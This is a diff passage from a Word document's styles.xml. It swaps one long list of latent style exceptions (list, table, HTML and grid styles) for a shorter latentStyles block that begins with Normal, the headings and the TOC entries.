-    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
-    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
-    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
-    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid" w:semiHidden="1" w:uiPriority="59" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
-    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Revision" w:semiHidden="1"/>
-    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
-    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
-    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
-    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
-    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
-    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
-    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
-    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
+    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Table Grid" w:uiPriority="59"/>
+    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
